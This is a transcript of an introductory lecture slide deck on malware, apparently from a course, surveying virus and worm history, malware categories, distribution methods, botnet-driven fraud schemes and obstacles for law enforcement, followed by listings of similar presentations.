Presentation is loading. Please wait.

Presentation is loading. Please wait.

Internet Vulnerabilities & Criminal Activities

Published byGabriel Townsend Modified over 7 years ago

Similar presentations

Presentation on theme: "Internet Vulnerabilities & Criminal Activities"— Presentation transcript:

1 Internet Vulnerabilities & Criminal Activities
Malware 10.1 4/12/10

2 Malware Malicious software designed to gain access to information and/or resources without the knowledge or consent of the end user. Can also be called crime ware No longer teen age kids messing around Now used by organized crime groups for prfit

3 Malware History 1981 - First Apple II virus in the wild
Fred Cohen coins term “virus” First PC virus Morris Internet worm First Polymorphic virus Virus Construction Set Good Times virus hoax First Macro Virus Back Oriface tool released

4 Malware History cont. 1999 - Melissa virus / worm
Tribal Flood Network - DDOS tool Code Red worm Nimda worm Slammer worm So Big & Sasser worms Storm worm Conficker worm

5 Malware Trends Increasing complexity & sophistication
Acceleration of the rate of release of innovative tools & techniques Movement from viruses to worms to kernel-level exploitations

6 Malware can be: “Proof of concept” “In the Wild.”
Created to prove it can be done Not found outside of laboratory environment If code available, can be used by others “In the Wild.” Found on computers in everyday use

7 Traditional Categories of Malware
Virus Worm Malicious Mobile Code Backdoor Trojan Horse Rootkit Combination Malware

8 Virus Infects a host file Self replicates
Requires human interaction to replicate Examples: Michelangelo Melissa Host file - exe, WP document

9 Worm Spreads across a network
Does not require human interaction to spread Self-replicating Examples: Morris Worm Code Red Slammer

10 Malicious Mobile Code Lightweight program downloaded from a remote source and executed locally Minimal human interaction Written in Javascript, VBScript, ActiveX, or Java Example: Cross Site Scripting

11 Backdoor Bypasses normal security controls
Gives attacker access to user’s system Example: Netcat Back Oriface Sub 7

12 Trojan Horse Program that disguises its hidden malicious purpose
Appears to be harmless game or screensaver Used for spyware & backdoors Not self-replicating

13 Rootkit Replaces or modifies programs thts are part of the operating system Two Levels User-level Kernel-level Examples Universal Rootkit Kernel Intrusion System

14 Combination Malware Uses a combination of various techniques to increase effectiveness Examples: Lion Bugbear.B

15 Malware Distribution Attachments Piggybacking Internet Worms
and Instant Messaging Piggybacking Malware added to legitimate program Adware, spyware EULA - End User License Agreement Internet Worms Exploit security vulnerability Used to install backdoors Adware, spyware may not be illegal cause of EULA

16 Malware Distribution cont.
Web Browser Exploit Malware added to legitimate web site Cross-site scripting & SQL Injection Visitors to web site may be infected Hacking Too labor intensive for large crime operations May be used to compromise DNS server Affiliate Marketing Web site owner paid 8¢ to 50 ¢ per machine to install malware on a visitor’s computer Cross site scripting & SQL injection all caused by input to web site - talked about problem in first class

17 Malware Activity Adware Spyware Hijacker Toolbars Dialers
Rogue Security Software Bots What malware is used to do

18 Adware Displays ads on infected machine Ads format can be:
Pop-ups Pop-under Embedded in programs On top web site ads More annoying than dangerous Not dependent on IE being open Not stopped by pop-up blockers May be related to web sites surfed

19 Spyware Send information about infected computer to someone, somewhere
Web sites surfed Terms searched for Information from web forms Files downloaded Search hard drive for files installed address book Browser history Logon names, passwords, credit card numbers Any other personal information Name, phone number, etc.

20 Hijacker Takes control of web browser IE vulnerable Home page
Search engines Search bar Redirect sites Prevent some sites from loading IE vulnerable IE

21 Toolbars Plug-ins to IE Attempt to emulate legitimate toolbars
Google Yahoo Attempt to emulate legitimate toolbars Installed via underhanded means Adware or Spyware Acts a keystroke logger

22 Dialers Alters modem connections and ISDN-Cards
Once installed, will dial numbers or other premium rate numbers Run up end-users phone bill & provide revenue for criminal enterprise Targets MS Windows God for use in Europe

23 Rogue Security Software
Usually delivered via a trojan horse Uses social engineering techniques to get user to install Fake warnings that computer is infected Fake video of machine crashing Disables anti-virus and anti-spyware programs Alters computer system so the rogue software cannot be removed

24 Bots Allows attacker remote access to a computer
When end-user is online, computer contacts Command & Control (C&C) site Bot will then perform what ever commands received from the C&C Some things botnets are used for Distributed Denial of Service (DDoS) attacks Spam Hosting contraband such as child porn Other illegal fraud schemes C&C often an IRC channel

25 More Malware Terminology
Downloader Single line of code Payload from malware Instructs infect computer to download malware from attacker’s server Drop Clandestine computer or service ( ) Collects information sent to it from infected machines Blind Drop - well hidden, designed to run attended

26 More Malware Terminology cont.
Exploit Code used to take advantage of a vulnerability in software code or configuration Form-grabber A program that steal information submitted by a user to a web site Packer Tool used to scramble and compress an .exe file Hides malicious nature of code Makes analysis of program more difficult Form grabber - used in phishing when using legit web site

27 More Malware Terminology cont.
Redirect HTTP feature Used to forward someone from one web page to another Done invisibly with malware Variant Malware produced from the same code base Different enough to require new signature for detection by anti-virus software

28 Malware Sources Malware Malware tools Can be programmed from scratch
Less likely to be detected by anti-malware programs Can be purchased Malware tools Haxdoor, Torpig, Metafisher, Web Attacker Tools offered with other services Access to botnet, drop sites Tools derived from small stable base of existing code Where do criminals get malware

29 Frauds Involving Malware
Advertising schemes Pay-per-view Pay-per-click (“Click Fraud”) Pay-per-install Banking fraud Identity theft Spam Denial-of-service attacks DoS extortion Advertising schemes take advantage of legit ad plans on the web

30 Advertising Schemes Pay-per-view
Sell advertising space on controlled web sites Command botnet to “view” as many ads as possible May have ads download in the background Fraudulent commissions generated

31 Advertising Schemes cont.
Pay-per-click (“”Click Fraud”) Similar to Pay-per-view fraud Bots simulate clicks on ads Between 5% and 35% of all ad commissions may be fraudulent Pay-per-install Commission paid every times advertisers software is installed When installed, notification sent to advertiser Infected machines will be instructed to install advertisers software Software browser plug-ins, adware, spyware

32 Banking Fraud Banks are a prime target of malware
Malware can allows attacker to empty victim’s bank account Newest malware (September 2009) Rewrite online bank statements on the fly Covers up theft of funds Trojan horse Alters HTML code before browser displays Makes use of “Money Mules” Crooks gain time Money mules - unaware of criminal nature of activity Allow their bank accounts too be used Social engineering - mule buys into te work at home scheme

33 Identity Theft Phishing & key logging
Recent increase in malware associated with identity theft Information sent to drop site

34 Spam Bots used to send spam Also show dramatic rise
Bots are available for rent for spam purposes Spam sent can also contain malware

35 Denial of Service Attacks
Botnet commanded to make requests of a web site Web site may crash due to heavy traffic Legitimate traffic blocked Threat of DoS attack can be used for extortion Bots for rent for DoS attacks Threats often made to sites w/no legal recourse such as offshore gambling sites

36 Problems for Law Enforcement
Anonymity Jurisdiction Attackers know how difficult international law enforcement is Exploit the situation Target victims in one country from another country Have C&C site and drop site located in a third country Use multiple proxies to access C&C site and drop site Money gain quickly funneled through online bank accounts and international money transfers

37 Other Issues Monetary Threshold Virtual world emboldens individuals
Must reach a limit before prosecutor will take case May be hard to prove exact amount of money involved Cyber crimes may be considered a non-priority Virtual world emboldens individuals Less fear of getting caught Realization of difficulties in investigating crimes

Download ppt "Internet Vulnerabilities & Criminal Activities"

Similar presentations

Providing protection from potential security threats that exist for any internet-connected computer is termed e- security. It is important to be able to.

Providing protection from potential security threats that exist for any internet-connected computer is termed e- security. It is important to be able to.
Thank you to IT Training at Indiana University Computer Malware.

Thank you to IT Training at Indiana University Computer Malware.
What is Bad ? Spam, Phishing, Scam, Hoax and Malware distributed via

What is Bad ? Spam, Phishing, Scam, Hoax and Malware distributed via
Protect your PC virus, worm, Trojan horse, phishing, spam, botnet and zombies, spoofing, social engineering, identity theft, spyware, rootkits Click.

Protect your PC virus, worm, Trojan horse, phishing, spam, botnet and zombies, spoofing, social engineering, identity theft, spyware, rootkits Click.
Security and Trust in E- Commerce. The E-commerce Security Environment: The Scope of the Problem  Overall size of cybercrime unclear; amount of losses.

Security and Trust in E- Commerce. The E-commerce Security Environment: The Scope of the Problem  Overall size of cybercrime unclear; amount of losses.
Dr. John P. Abraham Professor UTPA 2 – Systems Threats and Risks.

Dr. John P. Abraham Professor UTPA 2 – Systems Threats and Risks.
Threats To A Computer Network

Threats To A Computer Network
What Are Malicious Attacks? Malicious Attacks are any intentional attempts that can compromise the state of your computer. Including but not limited to:

What Are Malicious Attacks? Malicious Attacks are any intentional attempts that can compromise the state of your computer. Including but not limited to:
Viruses, Hacking, and AntiVirus. What is a Virus? A type of Malware – Malware is short for malicious software A virus – a computer program – Can replicate.

Viruses, Hacking, and AntiVirus. What is a Virus? A type of Malware – Malware is short for malicious software A virus – a computer program – Can replicate.
Chapter Nine Maintaining a Computer Part III: Malware.

Chapter Nine Maintaining a Computer Part III: Malware.
Threats and ways you can protect your computer. There are a number of security risks that computer users face, some include; Trojans Conficker worms Key.

Threats and ways you can protect your computer. There are a number of security risks that computer users face, some include; Trojans Conficker worms Key.
Internet safety By Lydia Snowden.

Internet safety By Lydia Snowden.
Internet safety Viruses A computer virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your.

Internet safety Viruses A computer virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your.
Internet Safety CSA 105 1.0 September 21, 2010. Internet Threats Malware (viruses) Spyware Spam Hackers Cyber-criminals.

Internet Safety CSA September 21, Internet Threats Malware (viruses) Spyware Spam Hackers Cyber-criminals.
Internet Vulnerabilities & Criminal Activities Malware 3.2 9/26/2011.

Internet Vulnerabilities & Criminal Activities Malware 3.2 9/26/2011.
B OTNETS T HREATS A ND B OTNETS DETECTION Mona Aldakheel 434920317 1.

B OTNETS T HREATS A ND B OTNETS DETECTION Mona Aldakheel
Cyber Crimes.

Cyber Crimes.
Malware  Viruses  E-mail Virus  Worms  Trojan Horses  Spyware –Keystroke Loggers  Adware.

Malware  Viruses  Virus  Worms  Trojan Horses  Spyware –Keystroke Loggers  Adware.
1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),

1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),
 We all know we need to stay safe while using the Internet, but we may not know just how to do that. In the past, Internet safety was mostly about.

 We all know we need to stay safe while using the Internet, but we may not know just how to do that. In the past, Internet safety was mostly about.

Similar presentations

Ads by Google